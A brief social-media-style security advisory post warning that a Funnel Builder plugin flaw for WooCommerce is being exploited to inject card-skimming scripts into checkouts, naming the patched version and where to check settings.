Funnel Builder Vulnerability Enables Skimmer Injection on WooCommerce Checkouts

Colleagues, please note: active exploitation of a vulnerability in the Funnel Builder plugin for WooCommerce has been observed.
- Sansec reports: versions before 3.15.0.3 allow unauthenticated attackers to write arbitrary JavaScript to the "External Scripts" checkout setting.
- Attackers disguise scripts as Google Tag Manager and load skimmers via remote C2 to steal card numbers, CVV and addresses.
- Over 40,000 stores affected; FunnelKit released a patch in v3.15.0.3. Check Settings > Checkout > External Scripts.
Why it matters: checkout compromise causes payment data leakage and reputational damage.
Have you checked your stores for unexpected checkout scripts?
#cybersecurity #WooCommerce #WordPress #Magecart


Latest comments
No comments yet.